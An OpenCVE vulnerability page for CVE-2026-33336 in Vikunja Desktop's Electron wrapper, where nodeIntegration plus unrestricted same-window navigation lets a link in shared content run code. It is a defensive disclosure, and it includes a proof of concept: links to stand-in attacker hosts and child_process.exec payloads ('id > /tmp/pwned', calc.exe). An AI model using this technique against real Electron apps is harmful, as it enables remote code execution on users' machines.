CVE-2026-33336

  1. OpenCVE
  2. Vulnerabilities (CVE)
  3. CVE-2026-33336
Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue. ## Root cause Two misconfigurations combine to create this vulnerability: 1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.). 2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by: - `<a href="https://...">` links (without `target="_blank"`) - `window.location` assignments - HTTP redirects - `<meta http-equiv="refresh">` tags ## Attack scenario 1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project). 2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `<a href="https://evil.example/exploit">Click here for the updated design spec</a>` 3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output. 4. The victim uses Vikunja Desktop and clicks the link. 5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process. 6. The attacker's page now executes in a context with `nodeIntegration: true` and runs: `require('child_process').exec('id > /tmp/pwned');` 7. Arbitrary commands execute as the victim's OS user. ## Impact Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient. ## Proof of concept 1. Set up a Vikunja instance with two users sharing a project. 2. As the attacker user, edit a project description to include: `<a href="https://attacker.example/poc.html">Meeting notes</a>` 3. Host poc.html with: `<script>require('child_process').exec('calc.exe')</script>` 4. As the victim, open the project in Vikunja Desktop and click the link. 5. calc.exe (or any other command) executes on the victim's machine. ## Credits This vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).

8.8 /10

CVSS v3 : HIGH

V3 Legend

Vector :

Exploitability : 2.8 / Impact : 5.9

Attack Vector NETWORK

Attack Complexity LOW

Privileges Required NONE

User Interaction REQUIRED

Confidentiality Impact HIGH

Integrity Impact HIGH

Availability Impact HIGH

Scope UNCHANGED

References
Link Resource
https://github.com/go-vikunja/vikunja/security/advisories/GHSA-83w9-9jf6-88vf Exploit Vendor Advisory
https://vikunja.io/changelog/vikunja-v2.2.0-was-released Release Notes
Configurations

Configuration 1 (hide)

cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*
History

27 Mar 2026, 16:54

Type Values Removed Values Added
CVSS v2 : unknown
v3 : unknown 		v2 : unknown
v3 : 8.8
Summary
  • (es) Vikunja es una plataforma de gestión de tareas de código abierto y autoalojada. Desde la versión 0.21.0 hasta la versión 2.2.0, el envoltorio Electron de Vikunja Desktop habilita `nodeIntegration` en la ventana principal del navegador (BrowserWindow) y no restringe las navegaciones dentro de la misma ventana. Un atacante que pueda colocar un enlace en contenido generado por el usuario (descripciones de tareas, comentarios, descripciones de proyectos) puede hacer que BrowserWindow navegue a un origen controlado por el atacante, donde JavaScript se ejecuta con acceso completo a Node.js, lo que da lugar a la ejecución de código arbitrario en el equipo de la víctima. La versión 2.2.0 corrige el problema. ## Causa raíz Dos errores de configuración se combinan para crear esta vulnerabilidad: 1. **`nodeIntegration: true`** está establecido en las preferencias web de `BrowserWindow` (`desktop/main.js:14-16`), lo que otorga a cualquier página cargada en el renderizador acceso completo a las API de Node.js (`require`, `child_process`, `fs`, etc.). 2. **No hay ningún controlador `will-navigate` o `will-redirect`** registrado en `webContents`. El `setWindowOpenHandler` existente (`desktop/main.js:19-23`) solo intercepta las llamadas a `window.open()` (solicitudes de nuevas ventanas). **No** intercepta las navegaciones dentro de la misma ventana provocadas por: - Enlaces `<a href="https://..." rel="nofollow">` (sin `target=«_blank»`) - Asignaciones de `window.location` - Redireccionamientos HTTP - Etiquetas `` ## Escenario de ataque 1. El atacante es un usuario normal en la misma instancia de Vikunja (por ejemplo, un miembro de un proyecto compartido). 2. El atacante crea o edita la descripción de un proyecto o de una tarea que contiene un enlace HTML estándar, por ejemplo: `</a><a href="https://evil.example/exploit" rel="nofollow">Haga clic aquí para ver las especificaciones de diseño actualizadas</a>` 3. La interfaz de Vikunja muestra este enlace. El proceso de sanitización de DOMPurify lo permite correctamente, ya que se trata de una etiqueta de anclaje legítima y no de una inyección de código. Ejemplo de ruta de renderizado: `frontend/src/views/project/ProjectInfo.vue` utiliza `v-html` con salida sanitizada por DOMPurify. 4. La víctima utiliza Vikunja Desktop y hace clic en el enlace. 5. Como no existe ningún controlador `will-navigate`, BrowserWindow navega a `https://evil.example/exploit` en el mismo proceso de renderizado. 6. La página del atacante se ejecuta ahora en un contexto con `nodeIntegration: true` y ejecuta: `require(“child_process”).exec(“id &gt; /tmp/pwned”);` 7. Se ejecutan comandos arbitrarios como usuario del sistema operativo de la víctima. ## Impacto Ejecución remota completa de código en el escritorio de la víctima. El atacante puede leer/escribir archivos arbitrarios, ejecutar comandos arbitrarios, instalar malware o puertas traseras, y sustraer credenciales y datos confidenciales. No se requiere ninguna vulnerabilidad XSS: basta con un hipervínculo normal aprobado por el sanitizador. ## Prueba de concepto 1. Configura una instancia de Vikunja con dos usuarios que compartan un proyecto. 2. Como usuario atacante, edita la descripción del proyecto para incluir: `<a href="https://attacker.example/poc.html" rel="nofollow">Notas de la reunión</a>` 3. Aloja el archivo poc.html con: `` 4. Como víctima, abre el proyecto en Vikunja Desktop y haz clic en el enlace. 5. Se ejecuta calc.exe (o cualquier otro comando) en el equipo de la víctima. ## Créditos Esta vulnerabilidad se detectó utilizando [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).
References () https://github.com/go-vikunja/vikunja/security/advisories/GHSA-83w9-9jf6-88vf - () https://github.com/go-vikunja/vikunja/security/advisories/GHSA-83w9-9jf6-88vf - Exploit, Vendor Advisory
References () https://vikunja.io/changelog/vikunja-v2.2.0-was-released - () https://vikunja.io/changelog/vikunja-v2.2.0-was-released - Release Notes
CPE cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*
First Time Vikunja
Vikunja vikunja

24 Mar 2026, 16:16

Type Values Removed Values Added
New CVE
Information

Published : 2026-03-24 16:16

Updated : 2026-03-27 16:54

NVD link : CVE-2026-33336

Mitre link : CVE-2026-33336

CVE.ORG link : CVE-2026-33336

JSON object : View

Products Affected

vikunja

  • vikunja
CWE
CWE-94

Improper Control of Generation of Code ('Code Injection')